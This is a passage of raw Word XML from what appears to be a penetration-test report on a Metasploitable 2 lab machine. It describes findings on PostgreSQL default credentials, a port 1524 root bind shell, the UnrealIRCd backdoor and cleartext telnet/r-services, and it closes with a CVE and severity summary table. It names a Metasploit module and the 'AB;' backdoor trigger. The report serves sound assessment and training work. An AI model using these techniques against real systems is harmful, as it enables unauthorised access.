          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). This allows an attacker to authenticate to the database and, using Metasploit's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit/linux/postgres/postgres_payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> module, execute a payload and obtain a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="220" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2.4  Metasploitable Root Bind Shell (Port 1524)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">TCP port 1524 hosts a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">pre-installed root bind shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ingreslock) on the Metasploitable 2 image. Any client connecting to this port is immediately granted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">an interactive root shell without authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. This represents the most severe finding in the assessment. While present by design in the Metasploitable training image, in any production environment this would constitute a catastrophic security failure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="220" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2.5  UnrealIRCd 3.2.8.1 (Port 6667)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The IRC service on port 6667 runs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">UnrealIRCd 3.2.8.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, associated with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2010-2075</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Certain distributed versions of this software contained an externally introduced backdoor. When a client sends the string </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">AB;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> followed by a system command, the server executes it with the privileges of the running process. This allows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">remote code execution without authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="220" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2.6  Telnet and Legacy Remote Access Services (Ports 23, 512–514)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Telnet service on port 23 transmits all data, including authentication credentials, in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">plain text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. An attacker with network access can capture credentials using a packet sniffer. Similarly, the legacy services </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">rexec (512)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">rlogin (513)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">rsh (514)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provide remote access without the encryption or robust authentication mechanisms provided by SSH. These services date from an era when network security was not a primary concern and should never be used in any environment where security matters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3  Vulnerability Findings Summary Table</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The following table consolidates all identified vulnerabilities, their associated CVE references, CVSS 3.1 scores, and risk classifications. Asterisked (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Severity classifications marked with * are based on the security implications of the exposed service type (exposure risk), not a confirmed CVSS score from the Nmap screenshot alone. CVE-linked entries carry their published CVSS 3.1 Base Score.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 10: Vulnerability Findings Summary</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9026"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:left w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:right w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:insideH w:val="single" w:color="CCCCCC" w:sz="2"/>
          <w:insideV w:val="single" w:color="CCCCCC" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Port/Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS 3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="827"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Metasploitable Root Bind Shell (Port 1524)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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N/A (by design)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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1524/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="C00000"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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vsftpd 2.3.4 Backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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CVE-2011-2523</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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21/tcp – FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="C00000"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Yes (CVE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Samba usermap_script RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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CVE-2007-2447</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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445/tcp – SMB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="C00000"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Exploited ✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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PostgreSQL Default Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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N/A (configuration)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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5432/tcp – DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="C00000"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Exploited ✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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UnrealIRCd 3.2.8.1 Backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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CVE-2010-2075</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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6667/tcp – IRC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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7.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="C55A11"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Yes (CVE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Telnet / Clear-text Remote Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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CWE-312</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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23/tcp – Telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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7.5*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="C55A11"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Yes (observed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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rlogin / rsh / rexec Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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CWE-311</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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512–514/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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7.5*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="C55A11"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Yes (observed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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NFS Export Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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CWE-552</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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2049/tcp – NFS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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7.5*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="C55A11"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FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
